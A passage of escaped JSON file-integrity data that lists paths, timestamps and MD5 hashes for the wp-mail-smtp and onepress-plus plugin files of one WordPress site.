\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/WildfireFormatter.php\":{\"d\":1544495632,\"h\":\"0834b1ae7cf8f9db2d3ccf40c9e8238b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/FormatterInterface.php\":{\"d\":1544495632,\"h\":\"6393c1db9899b0f9e3fc4ad3d6a898dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/LogglyFormatter.php\":{\"d\":1544495632,\"h\":\"f5a72f125c3028e31dcc502c74ddc8e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/JsonFormatter.php\":{\"d\":1544495632,\"h\":\"27360f4944089a943597a2c0c08518ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/LogstashFormatter.php\":{\"d\":1544495632,\"h\":\"73bd07ce780cf8deb8c4216c8b0f7829\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/FluentdFormatter.php\":{\"d\":1544495632,\"h\":\"e992598b2f929f75aacd6de842eade90\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/FlowdockFormatter.php\":{\"d\":1544495632,\"h\":\"ba10a9093d8c9fe1a2b2acbbc52803fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/NormalizerFormatter.php\":{\"d\":1544495632,\"h\":\"a6010a1af0a4f21bcc55867afd40e161\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/ScalarFormatter.php\":{\"d\":1544495632,\"h\":\"9934bbe7fbf1a7536cbabf0bb31fac8b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/ElasticaFormatter.php\":{\"d\":1544495632,\"h\":\"8be3318942ea2a823a0508c2f3df9795\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/MongoDBFormatter.php\":{\"d\":1544495632,\"h\":\"069d640fae028a0a9aeee615beb178ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/LineFormatter.php\":{\"d\":1544495632,\"h\":\"d0242dde02733795e07ea48132b97611\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/HtmlFormatter.php\":{\"d\":1544495632,\"h\":\"228d3c0e1ef63cb6ed003fd65265c3b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Formatter\\/GelfMessageFormatter.php\":{\"d\":1544495632,\"h\":\"83aaf607fb20ee8ea58ccba235dc2886\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/ProcessIdProcessor.php\":{\"d\":1544495632,\"h\":\"62476ed0523a188b116ecccebac90a2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/PsrLogMessageProcessor.php\":{\"d\":1544495632,\"h\":\"21547825abf621432f105ca2bd7a1514\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/GitProcessor.php\":{\"d\":1544495632,\"h\":\"881d1a15103e3a864a1a0af094af69e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/ProcessorInterface.php\":{\"d\":1544495632,\"h\":\"5dd810e614913d06486955e380fee8d2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/TagProcessor.php\":{\"d\":1544495632,\"h\":\"9ae9918278d274d04294edcf850fc715\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/MercurialProcessor.php\":{\"d\":1544495632,\"h\":\"aec839697dce14f2b35662ec83f8098d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/WebProcessor.php\":{\"d\":1544495632,\"h\":\"55fb49548b06dbb2e082d1a133b37c09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/IntrospectionProcessor.php\":{\"d\":1544495632,\"h\":\"07c3c7e0d7e876400abfde105de7ac81\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/MemoryPeakUsageProcessor.php\":{\"d\":1544495632,\"h\":\"b753a93665221b4ec3bb9b7e673a94a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/UidProcessor.php\":{\"d\":1544495632,\"h\":\"3d6404d4111a427bb6c7801be5cc7d58\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/MemoryProcessor.php\":{\"d\":1544495632,\"h\":\"da2d9c474d01225142b3278e0e6c88e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Processor\\/MemoryUsageProcessor.php\":{\"d\":1544495632,\"h\":\"6497ea95b20d9ae90826819cbc6d0676\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Registry.php\":{\"d\":1544495632,\"h\":\"d84f57e474a31a4285ad62a37ed8fa94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Logger.php\":{\"d\":1544495632,\"h\":\"62f20f9746a11f097467f627b0b93abe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/ResettableInterface.php\":{\"d\":1544495632,\"h\":\"9d15d64a9f3654e872927409135b1435\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/ErrorHandler.php\":{\"d\":1544495632,\"h\":\"2873d712055688c2b5b669c19b68b8f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/SignalHandler.php\":{\"d\":1544495632,\"h\":\"759781d77e90492c3b976c436103c834\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/src\\/Monolog\\/Utils.php\":{\"d\":1544495632,\"h\":\"e11e634ee0a8b5ad5fedeec5de216c5a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/monolog\\/monolog\\/LICENSE\":{\"d\":1544495632,\"h\":\"b9ec4658695d81c2087bb974eabc8adf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/vendor\\/autoload.php\":{\"d\":1544495632,\"h\":\"42123eddb3057cfd419b42afb2bc088a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Gmail\\/Auth.php\":{\"d\":1544495632,\"h\":\"a7cfd6b819d48588648d5536ec081265\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Gmail\\/Options.php\":{\"d\":1544495632,\"h\":\"0a7fb98af1eaa0b1515ad2e913d1b022\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Gmail\\/Mailer.php\":{\"d\":1544495632,\"h\":\"7b8df62bed3e102f039a446b3dc1f824\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Mailgun\\/Options.php\":{\"d\":1544495632,\"h\":\"131bc5c4025107b7f9f2b715d62b09ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Mailgun\\/Mailer.php\":{\"d\":1544495632,\"h\":\"9aaa1abcdaa5b9f518be22531294aace\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Sendgrid\\/Options.php\":{\"d\":1544495632,\"h\":\"f5d699f9479cd0c72576cc895b2ee09f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Sendgrid\\/Mailer.php\":{\"d\":1544495632,\"h\":\"22b0f2a1b0bc0be27e317a95b35dba02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/SMTP\\/Options.php\":{\"d\":1544495632,\"h\":\"d253a3ddbc11c2a3049e64e1d91a95ca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/SMTP\\/Mailer.php\":{\"d\":1544495632,\"h\":\"b69991498ec65c86e4af79df6be19b78\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Mail\\/Options.php\":{\"d\":1544495632,\"h\":\"fe7fec7d1d9583ecffeee0237caca460\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Mail\\/Mailer.php\":{\"d\":1544495632,\"h\":\"c70802e5f617f2aae22d39c5a7e06967\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Pepipost\\/Options.php\":{\"d\":1544495632,\"h\":\"4efb04295efe3de534f2d3ef7cb2915a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Pepipost\\/Mailer.php\":{\"d\":1544495632,\"h\":\"104b18686734b10d7835ef64ba27019f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/MailerInterface.php\":{\"d\":1544495632,\"h\":\"2485b9a542658363ccd121f53f7ba86b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/AuthInterface.php\":{\"d\":1544495632,\"h\":\"a5e055c974b794465968c62545bb2e48\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/Loader.php\":{\"d\":1544495632,\"h\":\"f30a8c9f1effc5219b68e2e15810f9fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/AuthAbstract.php\":{\"d\":1544495632,\"h\":\"86c4c6c3eed3cf4c2b110d682de765d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/OptionsInterface.php\":{\"d\":1544495632,\"h\":\"64f59167decee3261cfdce5ae827705a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/OptionsAbstract.php\":{\"d\":1544495632,\"h\":\"ae02449b45b3ea82322655c0da1e67b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Providers\\/MailerAbstract.php\":{\"d\":1544495632,\"h\":\"fcdf1137522599d006090522fee599f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/Settings.php\":{\"d\":1544495632,\"h\":\"bb898384b69d4f33b39dda5911e95997\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/Test.php\":{\"d\":1544495632,\"h\":\"23af490d4485fb159bee58e2a4b51291\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/Misc.php\":{\"d\":1544495632,\"h\":\"c67ed3a06c643617e3c8d601a04152a7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/Auth.php\":{\"d\":1544495632,\"h\":\"fc10c77f7c96470b6181c3a242920b57\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Area.php\":{\"d\":1544495632,\"h\":\"393dca40ba079144a46ac95dc7c67fdb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/PageAbstract.php\":{\"d\":1544495632,\"h\":\"d7654ae54b7eae50e15a5e220c1fe821\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/PageInterface.php\":{\"d\":1544495632,\"h\":\"feec74911e79d398b0fe284e79bf133a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Upgrade.php\":{\"d\":1544495632,\"h\":\"4b2538b34b31c7f84077f5b59775ac19\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Debug.php\":{\"d\":1544495632,\"h\":\"a8f93b58c5d1e858dc98ea041e7f6303\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/WP.php\":{\"d\":1544495632,\"h\":\"4fa1e672efd6234289ee054c33b65d55\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Options.php\":{\"d\":1544495632,\"h\":\"8181dc9dc49d8bceb3ee721d6998350d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Processor.php\":{\"d\":1544495632,\"h\":\"5f8d46945483f960153d72b1393d261e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Core.php\":{\"d\":1544495632,\"h\":\"cd5016d8417c14f388e5e06114118dcb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/MailCatcher.php\":{\"d\":1544495632,\"h\":\"7b9c8adef1f6b21529ffeeb91fe7de7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Migration.php\":{\"d\":1544495632,\"h\":\"1722eac774924a5750176efa9afa8557\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/TGMPA.php\":{\"d\":1544495632,\"h\":\"53150e586b2c373afcac2a98554d6a55\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/AM_Notification.php\":{\"d\":1544495632,\"h\":\"d5608aefa3082f7f9ba440e12b71bd0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/uninstall.php\":{\"d\":1544495629,\"h\":\"5be00e828b6518e739548fa72248fff6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/wp_mail_smtp.php\":{\"d\":1544495632,\"h\":\"5fda10e8ed8ed455c9cb2b5e1dd23ecd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/class-wpms-am-notification.php\":{\"d\":1544495632,\"h\":\"61585e1e8bf5fcf612ef198c9b34215b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/wp-mail-smtp.php\":{\"d\":1544495632,\"h\":\"e39a5a490dfd26a6f5c0de1ac8a040e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wp-mail-smtp\\/readme.txt\":{\"d\":1544495632,\"h\":\"ffcb89cb91fb434fa6a71ca5f98124eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/assets\\/sass\\/_variables.scss\":{\"d\":1545792805,\"h\":\"dc656e8005747bbc1cb925193945f147\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/assets\\/sass\\/onepress-plus.scss\":{\"d\":1545792805,\"h\":\"0bb1eafcfcbcb2c3d0ba1db352aee968\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/assets\\/js\\/slider.js\":{\"d\":1545792805,\"h\":\"a292609dee25bebde7a92a164e1bf7a7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/assets\\/js\\/onepress-plus.js\":{\"d\":1545792805,\"h\":\"7fbf8e05af2c8337889bfbeff668c605\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/languages\\/onepress-plus.pot\":{\"d\":1545792805,\"h\":\"2995421eb1bcb452e6d5549a10285405\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/templates\\/template-portfolios.php\":{\"d\":1545792805,\"h\":\"c7b395d41787e37ea3997630e3db5102\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/templates\\/portfolio.php\":{\"d\":1545792805,\"h\":\"be51131b43b5ad765a95cfcbefba3817\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/auto-update\\/auto-update.php\":{\"d\":1545792805,\"h\":\"2ee3915ecaf5bc8e620769db5529f7a7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/auto-update\\/plugin-updater.php\":{\"d\":1545792805,\"h\":\"257589b777a2b2ce272049631408e200\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/auto-update\\/EDD_SL_Plugin_Updater.php\":{\"d\":1545792805,\"h\":\"c37d84605a08f266ab8e9d4922a290d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/vendors\\/elementor.php\":{\"d\":1545792805,\"h\":\"21d8da46b637870d95651d0ff3e94685\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/typography\\/css\\/typography-controls.css\":{\"d\":1545792805,\"h\":\"4d02d99d056d089353bebb4ba06d46a7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/typography\\/js\\/typography-controls.js\":{\"d\":1545792805,\"h\":\"f48282af33a6852cea25f53beacaf571\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/typography\\/typography.php\":{\"d\":1545792805,\"h\":\"c938cd7dbdfdd76bcf68e176a5d59a5e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/typography\\/auto-apply.php\":{\"d\":1545792805,\"h\":\"617813c21abc52832a22bf1710f6aab3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/typography\\/google-fonts.php\":{\"d\":1545792805,\"h\":\"e220541993791aa4450565346c2868d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/typography\\/helper.php\":{\"d\":1545792805,\"h\":\"deb13eaea5facbe29c03a7d81c8bedd4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/section-map.php\":{\"d\":1545792805,\"h\":\"b37dde5ffc818f318da3c3a3b4e09150\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/section-hero.php\":{\"d\":1545792805,\"h\":\"3c6c6d91971b4de17d08a8a74645196a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/section-pricing.php\":{\"d\":1545792805,\"h\":\"13e3efb21d6260108d8a04b3f4ba526c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/global.php\":{\"d\":1545792805,\"h\":\"32b614b0841683f5d99d5170194eb7df\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/section-slider.php\":{\"d\":1545792805,\"h\":\"98a76b053192ebaed583140aab22aea5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/section-gallery.php\":{\"d\":1545792805,\"h\":\"b74df6c8825597ea8cfca8061ea38174\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/section-testimonials.php\":{\"d\":1545792805,\"h\":\"71fc59a80bb8737676dda46e1b3388ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/section-order-styling.php\":{\"d\":1545792805,\"h\":\"ab06db443baf598e4a3382f26f46206d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/section-cta.php\":{\"d\":1545792805,\"h\":\"71beb6bf284192c2702b1291791c0b70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/section-clients.php\":{\"d\":1545792805,\"h\":\"ff4a420dc9c393bf89e0acc5bcc92921\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/section-projects.php\":{\"d\":1545792805,\"h\":\"8a020677baf53e8c9aa68371df4f243f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/customize-configs\\/section-team.php\":{\"d\":1545792805,\"h\":\"33e50f3526d67ba894cf167a6304675b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/class-section-base.php\":{\"d\":1545792805,\"h\":\"40c3079b6ee36f97dfacf214783275dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/class-customize.php\":{\"d\":1545792805,\"h\":\"c0a2a3b24867126618a514a00ce9e23e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/class-configs.php\":{\"d\":1545792805,\"h\":\"7d757a02440212175311cce0fb53d52b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/template-tags.php\":{\"d\":1545792805,\"h\":\"78ef3e8ab63ab78db2f84df50abe930a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/ajax.php\":{\"d\":1545792805,\"h\":\"02cf8f05776054e70f6fbeab1ab17e31\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/inc\\/post-type.php\":{\"d\":1545792805,\"h\":\"7394e8c20a9118617692fef3bf4bed89\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/section-parts\\/section-map.php\":{\"d\":1545792805,\"h\":\"3de3a1a8cb360c5ca6115cf055ba7fcd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/section-parts\\/section-hero.php\":{\"d\":1545792805,\"h\":\"5d0ebd4ad86e635d46179ffb892d8df8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/section-parts\\/section-videolightbox.php\":{\"d\":1545792805,\"h\":\"5baf587c7bb45314f63effd292f0a54f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/section-parts\\/section-pricing.php\":{\"d\":1545792805,\"h\":\"03e75c7131eb6112d5f3c022b75ada02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/section-parts\\/section-slider.php\":{\"d\":1545792805,\"h\":\"924dc26d6d9da1c4b74d2c6985b05f43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/section-parts\\/section-testimonials.php\":{\"d\":1545792805,\"h\":\"56ff943a65a47df8632c25adbbfccf8b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/section-parts\\/section-cta.php\":{\"d\":1545792805,\"h\":\"a388c613728d8b2c5adc9fdc6db9665a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/section-parts\\/section-clients.php\":{\"d\":1545792805,\"h\":\"3969cd2f34852b2974678f4e24ca5468\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/section-parts\\/section-projects.php\":{\"d\":1545792805,\"h\":\"52d131d8609a266555f130aa8f48828f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/onepress-plus\\/onepress-plus.php\":{\"d\":154579280